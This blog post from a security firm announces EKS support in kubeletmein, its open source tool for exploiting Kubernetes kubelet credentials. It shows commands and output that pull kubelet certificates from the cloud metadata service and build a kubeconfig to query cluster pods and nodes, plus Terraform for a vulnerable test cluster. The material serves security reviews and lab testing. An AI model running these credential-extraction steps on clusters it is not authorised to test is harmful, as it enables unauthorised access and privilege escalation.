Kubeletmein, our open source tool for exploiting Kubernetes kubelet credentials now supports AWS EKS.
I wrote kubeletmein back in 2018 and it’s been really useful on our Kubernetes security reviews. Initially it just supported Google Kubernetes Engine, then Digital Ocean was added but it was always the goal to add AWS EKS and Azure AKS (though I’ve not yet done the research to understand if the same exploit will work).
I was blown away this week to receive a pull request from airman604 adding EKS support. It’s always nice when someone finds software you write useful and even more amazing when they take the time to improve it, then contribute it back. Thank you.
I’ve merged in the PR and took the opportunity to make some other improvements.
Changes
- EKS support for both managed and unmanaged nodes (the user-data is different depending on which one you use).
- Command line options unified so now you just run
kubeletmein <cloud>
. - Added tests for GKE and DigitalOcean (aws-sdk-go is not quite as easy to mock, or at least I’ve not got it to work yet).
- Added example Terraform configurations to fire up test clusters.
- Switched Dockerfile to use gcloud Debian image and install AWS CLI to support EKS authentication.
- Added –version flag.
EKS
One of the major differences with EKS is the control over user-data that you have. This provides a lot of flexibility in the configuration of the worker nodes and the kubelet however, it does make writing support for all options pretty much impossible.
At the moment it will work with clusters created with eksctl and through the AWS Management Console. If you have custom user-data to call the /etc/eks/bootstrap.sh
manually then this won’t work right now. I’m going to try and add some parsing support for this soon.
From inside your pod you will need access to either aws-iam-authenticator
or the AWS CLI (aws eks get-token
) to access the cluster. If you are in a position to deploy our container image this has everything you need. Just deploy a pod with image 4armed/kubeletmein
.
Command Line Changes
This is a breaking change. GKE and DigitalOcean both create bootstrap kubeconfig, then request a node certificate. This meant we used to run kubeletmein gke bootstrap
or kubeletmein do bootstrap
, then kubeletmein <provider> generate -n node-name
. EKS doesn’t work the same way. It just uses IAM authentication on the node so the kubeconfig you generate is the one you keep using.
To keep the cli experience consistent I refactored GKE and DO so they run both the bootstrap and generate options in a single step. If you want to skip the bootstrap step you can use --skip-bootstrap
.
So now GKE would look like this:
root@kubeletmein-vulnerable:/# kubeletmein gke -n foo
2021-03-04T22:25:52Z [ℹ] fetching kubelet creds from metadata service
2021-03-04T22:25:52Z [ℹ] writing ca cert to: ca-certificates.crt
2021-03-04T22:25:52Z [ℹ] writing kubelet cert to: kubelet.crt
2021-03-04T22:25:52Z [ℹ] writing kubelet key to: kubelet.key
2021-03-04T22:25:52Z [ℹ] generating bootstrap-kubeconfig file at: bootstrap-kubeconfig
2021-03-04T22:25:52Z [ℹ] wrote bootstrap-kubeconfig
2021-03-04T22:25:52Z [ℹ] using bootstrap-config to request new cert for node: foo
2021-03-04T22:25:53Z [ℹ] got new cert and wrote kubeconfig
2021-03-04T22:25:53Z [ℹ] now try: kubectl --kubeconfig kubeconfig get pods
root@kubeletmein-vulnerable:/# kubectl --kubeconfig kubeconfig get pods
NAME READY STATUS RESTARTS AGE
kubeletmein-vulnerable 1/1 Running 0 12m
root@kubeletmein-vulnerable:/# kubectl --kubeconfig kubeconfig get nodes
NAME STATUS ROLES AGE VERSION
gke-kubeletmein-kubeletmein-vulnerabl-6623dbee-mgkd Ready <none> 11m v1.18.12-gke.1210
Terraform
Testing this all out requires access to public cloud provider Kubernetes clusters. As you can imagine you will want to spin these up and shut down them down fairly regularly while you’re looking at this, to avoid a large bill.
To make this easier I’ve added some example Terraform configurations too. Under the deploy/terraform
folder you will find subfolders for each cloud provider service. Change into the required directory and edit the variables, if needed. You will need credentials configured for whichever provider you’re going to use. Please check the links to the Terraform provider documentation in the repo if you’re not sure how to do this.
At the moment I’ve added GKE and DigitalOcean configurations. I’ve got a semi-working EKS almost there but that’ll probably come out next week.
There’s a Makefile
included in each folder to help out with running the Terraform commands but I’m assuming some familiarity with it. Basically just terraform init
, terraform apply
will work (though I’d recommend a plan
first).
The plan will also deploy a pod named kubeletmein-vulnerable
to the cluster which you can just exec into when it’s ready.
Sample output for GKE:
$ export TF_VAR_project_id=your-gcloud-project-id
$ make init
terraform get
terraform init \
-reconfigure \
-input=false \
-get=true \
-upgrade \
-backend=true \
-lock=true
Initializing the backend...
Initializing provider plugins...
- Finding latest version of hashicorp/google...
- Finding latest version of hashicorp/kubernetes...
- Installing hashicorp/google v3.58.0...
- Installed hashicorp/google v3.58.0 (signed by HashiCorp)
- Installing hashicorp/kubernetes v2.0.2...
- Installed hashicorp/kubernetes v2.0.2 (signed by HashiCorp)
Terraform has made some changes to the provider dependency selections recorded
in the .terraform.lock.hcl file. Review those changes and commit them to your
version control system if they represent changes you intended to make.
Terraform has been successfully initialized!
You may now begin working with Terraform. Try running "terraform plan" to see
any changes that are required for your infrastructure. All Terraform commands
should now work.
If you ever set or change modules or backend configuration for Terraform,
rerun this command to reinitialize your working directory. If you forget, other
commands will detect it and remind you to do so if necessary.
Then run a plan:
$ make plan
terraform plan -input=false -out "gke.tfplan"
An execution plan has been generated and is shown below.
Resource actions are indicated with the following symbols:
+ create
<= read (data resources)
Terraform will perform the following actions:
# data.google_container_cluster.kubeletmein will be read during apply
# (config refers to values not yet known)
<= data "google_container_cluster" "kubeletmein" {
+ addons_config = (known after apply)
+ authenticator_groups_config = (known after apply)
[..]
Finally, apply the configuration. At this point you start getting billed so don’t forget about this cluster!!!
$ make apply
terraform apply "gke.tfplan"
google_container_cluster.kubeletmein: Creating...
google_container_cluster.kubeletmein: Still creating... [10s elapsed]
google_container_cluster.kubeletmein: Still creating... [20s elapsed]
google_container_cluster.kubeletmein: Still creating... [30s elapsed]
google_container_cluster.kubeletmein: Still creating... [40s elapsed]
google_container_cluster.kubeletmein: Still creating... [50s elapsed]
google_container_cluster.kubeletmein: Still creating... [1m0s elapsed]
google_container_cluster.kubeletmein: Still creating... [1m10s elapsed]
google_container_cluster.kubeletmein: Still creating... [1m20s elapsed]
[..]
Exec into the kubeletmein-vulnerable
pod.
$ kubectl exec -ti kubeletmein-vulnerable bash
root@kubeletmein-vulnerable:/# kubeletmein gke -n foo
2021-03-04T22:25:52Z [ℹ] fetching kubelet creds from metadata service
2021-03-04T22:25:52Z [ℹ] writing ca cert to: ca-certificates.crt
2021-03-04T22:25:52Z [ℹ] writing kubelet cert to: kubelet.crt
2021-03-04T22:25:52Z [ℹ] writing kubelet key to: kubelet.key
2021-03-04T22:25:52Z [ℹ] generating bootstrap-kubeconfig file at: bootstrap-kubeconfig
2021-03-04T22:25:52Z [ℹ] wrote bootstrap-kubeconfig
2021-03-04T22:25:52Z [ℹ] using bootstrap-config to request new cert for node: foo
2021-03-04T22:25:53Z [ℹ] got new cert and wrote kubeconfig
2021-03-04T22:25:53Z [ℹ] now try: kubectl --kubeconfig kubeconfig get pods
root@kubeletmein-vulnerable:/# kubectl --kubeconfig kubeconfig get pods
NAME READY STATUS RESTARTS AGE
kubeletmein-vulnerable 1/1 Running 0 12m
root@kubeletmein-vulnerable:/# kubectl --kubeconfig kubeconfig get nodes
NAME STATUS ROLES AGE VERSION
gke-kubeletmein-kubeletmein-vulnerabl-6623dbee-mgkd Ready <none> 11m v1.18.12-gke.1210
Summary
You can find all the updates on the Kubeletmein Github Repo.
I’ll do another blog soon about changes to public cloud providers and what’s different in 2021 vs 2018 when I first wrote about this. GKE have made some big steps forward (Shielded VMs for example). DigitalOcean are, well, the same as they ever were when it comes to security so I don’t see much change there. EKS is quite versatile but a much more difficult setup experience security-wise.
I will also look at Azure, I promise.
I hope this tool is useful to you. If you have any questions or you’d like to speak to us about reviewing your Kubernetes infrastructure security, please just get in touch.